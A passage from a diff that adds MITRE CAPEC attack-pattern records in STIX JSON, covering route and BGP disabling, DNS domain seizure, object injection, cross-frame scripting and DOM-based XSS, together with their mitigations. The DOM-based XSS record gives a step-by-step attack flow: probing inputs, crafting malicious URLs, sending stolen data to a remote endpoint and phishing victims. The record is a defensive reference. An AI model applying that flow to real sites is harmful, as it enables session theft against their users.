"Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire security tool information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-581-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--679fbac3-8799-4a09-948f-0d9e83b3765f", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e2e2530-ac1b-4b0a-8889-a7058a982190", + "target_ref": "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-14T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disables the network route between two targets. The goal is to completely sever the communications channel between two entities. This is often the result of a major error or the use of an \"Internet kill switch\" by those in control of critical infrastructure. This attack pattern differs from most other obstruction patterns by targeting the route itself, as opposed to the data passed over the route.", + "external_references": [ + { + "external_id": "CAPEC-582", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/582.html" + } + ], + "id": "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route denies the availability of a service.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08" + ], + "x_capec_prerequisites": [ + "The adversary requires knowledge of and access to network route." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "external_id": "CAPEC-583", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html" + }, + { + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "external_id": "REF-464", + "source_name": "reference_from_CAPEC", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf" + } + ], + "id": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Hardware" + ], + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure rigorous physical defensive measures to keep the adversary from accessing critical systems..", + "id": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-583-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52c0fc53-41a5-4784-b605-f2404b5643c9", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f175c018-1dfe-4c0d-bec0-f5b9afb1d6a7", + "target_ref": "attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary suppresses the Border Gateway Protocol (BGP) advertisement for a route so as to render the underlying network inaccessible. The BGP protocol helps traffic move throughout the Internet by selecting the most efficient route between Autonomous Systems (AS), or routing domains. BGP is the basis for interdomain routing infrastructure, providing connections between these ASs. By suppressing the intended AS routing advertisements and/or forcing less effective routes for traffic to ASs, the adversary can deny availability for the target network.", + "external_references": [ + { + "external_id": "CAPEC-584", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/584.html" + }, + { + "description": "Why is it Taking so Long to Secure Internet Routing?, 2014, ACM", + "external_id": "REF-465", + "source_name": "reference_from_CAPEC", + "url": "https://queue.acm.org/detail.cfm?id=2668966" + }, + { + "description": "Beware of BGP Attacks, 2004, ACM SIGCOMM", + "external_id": "REF-466", + "source_name": "reference_from_CAPEC", + "url": "http://www.cc.gatech.edu/~dovrolis/Papers/ccr-bgp.pdf" + } + ], + "id": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "modified": "2020-12-17T00:00:00.000Z", + "name": "BGP Route Disabling", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a network route at the routing infrastructure level denies availability of that route.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Blackholing: The adversary intentionally references false routing advertisements in order to attract traffic to a particular router so it can be dropped." + ], + "x_capec_prerequisites": [ + "The adversary must have control of a router that can modify, drop, or introduce spoofed BGP updates.The adversary can convince" + ], + "x_capec_resources_required": [ + "BGP Router" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Ingress filters to check the validity of received routes. However, this relies on the accuracy of Internet Routing Registries (IRRs) databases which are often not well-maintained.", + "id": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76b92e8e-8863-490a-a6e4-c241e602b86e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32e9cc12-1ed9-4725-9fd2-d09ced47db65", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement Secure BGP (S-BGP protocol), which improves authorization and authentication capabilities based on public-key cryptography.", + "id": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-584-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbf5fc63-f216-4101-9b1b-a09e8272547c", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary influences a target's web-hosting company to disable a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.", + "external_references": [ + { + "external_id": "CAPEC-585", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/585.html" + }, + { + "description": "Dozens of Online 'Dark Markets' Seized Pursuant to Forfeiture Complaint Filed in Manhattan Federal Court in Conjunction with the Arrest of the Operator of Silk Road 2.0, 2014, FBI", + "external_id": "REF-467", + "source_name": "reference_from_CAPEC", + "url": "https://www.fbi.gov/contact-us/field-offices/newyork/news/press-releases/dozens-of-online-dark-markets-seized-pursuant-to-forfeiture-complaint-filed-in-manhattan-federal-court-in-conjunction-with-the-arrest-of-the-operator-of-silk-road-2.0" + } + ], + "id": "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Domain Seizure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a target domain at the infrastructure level denies the availability of its service to the user.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The FBI's seizure of gambling websites, the US DOJ's seizure of child pornography websites, and Microsoft's seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains." + ], + "x_capec_prerequisites": [ + "This attack pattern requires that the adversary has cooperation from the registrar of the target domain." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.", + "external_references": [ + { + "external_id": "CAPEC-586", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/586.html" + }, + { + "external_id": "CWE-502", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/502.html" + }, + { + "description": "Deserialization of Untrusted Data, 2017--01, OWASP", + "external_id": "REF-468", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Object Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Functions that assume information in the deserialized object is valid could be exploited.)" + ], + "Availability": [ + "Resource Consumption (If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources.)" + ], + "Integrity": [ + "Modify Data (Attackers can modify objects or data that was assumed to be safe from modification.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must unserialize data before validation." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Validate object before deserialization process\n ", + "id": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50611ddc-8881-4263-bab2-125e6dffc2dd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Design: Limit which types can be deserialized.\n ", + "id": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c5e70b1-a550-4e28-b4d8-d9530d4fab32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be57abfe-85d5-4551-999f-0b9a7599d222", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Keep session state on the server, when possible.\n ", + "id": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e21732f4-8d62-489d-a0d9-028bc964377b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid clicking on untrusted links.", + "id": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3562cf5-2484-4ed5-97e3-8da8f0bf5ea7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame.", + "id": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de5b8ee3-b664-4dc0-8e2e-e49c5c3df549", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.", + "external_references": [ + { + "external_id": "CAPEC-588", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/588.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Reflected DOM Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Reflected_DOM_Injection" + }, + { + "description": "Amit Klein, DOM Based Cross Site Scripting or XSS of the Third Kind", + "external_id": "REF-471", + "source_name": "reference_from_CAPEC", + "url": "http://www.webappsec.org/projects/articles/071105.shtml" + }, + { + "description": "Jakob Kallin, Irene Lobo Valbuena, A comprehensive tutorial on cross-site scripting", + "external_id": "REF-472", + "source_name": "reference_from_CAPEC", + "url": "https://excess-xss.com/" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-618", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DOM-Based XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful DOM-based XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the '#' character) can be used.\n http://my.site.com/aform.html#mode=\n In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for DOM-based XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Specific to DOM-based XSS, the adversary is looking for areas where input is being used to directly change the DOM.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim. In DOM-based XSS, the malicious script might not even be sent to the server, since the victim's browser will manipulate the DOM itself. This can help avoid serve-side detection mechanisms.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Add a URL fragment to alter the value of the expected Document object URL.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that manipulates the DOM via client-side scripting.", + "An application that failS to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": 